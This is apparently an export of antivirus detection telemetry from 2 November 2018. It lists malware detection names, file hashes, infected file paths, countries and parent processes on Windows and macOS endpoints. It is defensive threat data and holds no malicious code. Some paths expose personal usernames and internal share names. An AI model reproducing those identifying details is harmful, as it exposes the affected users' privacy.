  Row(detection=Row(filename='06d88b9d01cdb35b3588f9ef1e2488c5ca905f586deb2106ec6cdaa703843752', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-27\\06D88B9D01CDB35B3588F9EF1E2488C5CA905F586DEB2106EC6CDAA703843752', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='06d88b9d01cdb35b3588f9ef1e2488c5ca905f586deb2106ec6cdaa703843752', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:14:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zbd.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\ZBD\\ZBD.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='32e359d84adff5e9c4a53e76aefa4f8ce45b6d3f829616f1c9082581d8d26dad', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:10:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='grotty.exe', filepath='C:\\altera\\91sp2\\quartus\\bin\\cygwin\\bin\\grotty.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='1e270e47555965a89f16c71287f37b1bdc3fb17a2c188069aad8ae5271d04a87', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T09:10:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transfer.exe', filepath='\\\\?\\C:\\SWDE\\C-SWDE\\bin\\transfer.exe', filesize=640000, name='HEUR/APC.#M1.#R1'), hash='3f55ca75850001e31add3eb2261f3453e9d7a3f4648f9cbb76266171908c75b1', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:24:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='26c4acfcd7541ae62fb29525bd05b49ee443af0e849669e32fe42f55f2e4f4c1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\26C4ACFCD7541AE62FB29525BD05B49EE443AF0E849669E32FE42F55F2E4F4C1', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='26c4acfcd7541ae62fb29525bd05b49ee443af0e849669e32fe42f55f2e4f4c1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:02:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175532-062240f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-175532-062240F2', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:55:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='stadint.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\STADINT\\STADINT.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T03:14:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='start.exe', filepath='\\\\n5550\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\會計管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='2d9810625653bfddbfe589aa06330e44380be67ed01cc09e73fcb41b2ba52f89', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:1upUepgZNU2jR\\\\\\/+9.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:02:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133002-2a7c484a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4bbc9244\\AVSCAN-20181102-132950-28137E23\\AVSCAN-20181102-133002-2A7C484A', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:30:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\Program Files\\Aurora3D\\Maker3D\\unins000.exe', filesize=22528000, name='W32/Sality.AT.#M1.#R1'), hash='2eb0e7c909557cd71d15f7f2bbc41058a26d7660b62fc318cbe36b84a761c11c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:29:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='patterns.pif', filepath='C:\\Users\\X\\Documents\\Corel\\Content X6\\Bitmap Patterns\\Patterns.pif', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T03:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ultimatehwe.exe', filepath='\\\\?\\C:\\UMTool\\UltimateHwe\\UltimateHWE.exe', filesize=5696000, name='HEUR/AGEN.1017632.#M1.#R1'), hash='36ebba073148efd4ea8ae03d7eeeb218b1999939fd9aca32c40c1c10d91bdd5d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:40:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-223945-2ff767d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_33dae098\\AVSCAN-20181102-223903-2AD03C9F\\AVSCAN-20181102-223945-2FF767D1', filesize=320000, name='TR/Crypt.XPACK.39a52f.#M1.#R1'), hash='39a52fcc238b7643586ab46800984d87649c0aa5101a845416943eeaf7a6bb4a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:39:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054545-832c59a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054545-832C59A3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.622\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.622\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T09:29:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052203-340aef6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052203-340AEF6D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='56fbf531e2b11de8e66c53c300e0910bccdfd8d209d06afe314a5932617b000c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\56FBF531E2B11DE8E66C53C300E0910BCCDFD8D209D06AFE314A5932617B000C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='56fbf531e2b11de8e66c53c300e0910bccdfd8d209d06afe314a5932617b000c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:18:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054708-b4c4b971', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054708-B4C4B971', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.vir', filepath='C:\\Users\\X\\AppData\\Local\\Canon Network Tool\\msIExEc64.VIR', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='-r', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Free 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T07:40:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053131-86a665ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053131-86A665EA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051527-47b99337', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051527-47B99337', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054242-1635c756', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054242-1635C756', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kfkebgcx.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\KFKEBgCx.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='caption.htm', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Presets\\WebContactSheet\\Horizontal Blue & Gray\\Caption.htm', filesize=216000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='735550dbfbc1c73afa2ac51af7d1b83a3c685e61d4a5a7532810e805fe8052a7', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T05:40:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX98.264\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX98.264\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T05:33:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qtwcodecsd4.dll', filepath='e:\\pisonet gaming\\games\\steam\\steamapps\\common\\dota 2 beta\\game\\bin\\win32\\qt_plugins\\codecs\\qtwcodecsd4.dll', filesize=576000, name='W32/Ramnit.C.#M1.#R1'), hash='52ee3b80822eff5e263376a2c5ded1074043a7112ffaf7f8d56bd58da6262c31', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:42:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered notel', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered notel', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='66bf5e284a4da1edd06c0642be2278a0cafe63675b99bd29a587703cb431e6d7', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:42:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050251-8533d27c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050251-8533D27C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmnt.exe', filepath='D:\\ninja turtles on USER1 (User1)\\tmnt.exe', filesize=2176000, name='W32/Neshta.A.#M1.#R1'), hash='6928b8f9ce12463e765847b176734a8097b801cb66ecd33ed7507d1a0bd275b4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T17:04:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051701-7fe06a45', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051701-7FE06A45', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061459-98ea7050', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061459-98EA7050', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051548-54104728', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051548-54104728', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='logo.exe', filepath='I:\\ألعاب\\Games 1\\بولنج\\MIXOLGY.NET_Bowling.Hawaiian.Vacationd. _By  MIDOPOP\\gfx\\logo\\logo.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='50b1bf2fd333fc92463a627064936a9efb4d13f4dd8282a16d7b2e0063762871', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054638-a2ddc5b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054638-A2DDC5B9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144915-d789b636', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-144915-D789B636', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061245-4917be1f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061245-4917BE1F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061731-f3a89599', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061731-F3A89599', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060215-d150a095', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060215-D150A095', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:13Z'), dt=datetime.date(2018, 11, 2)),
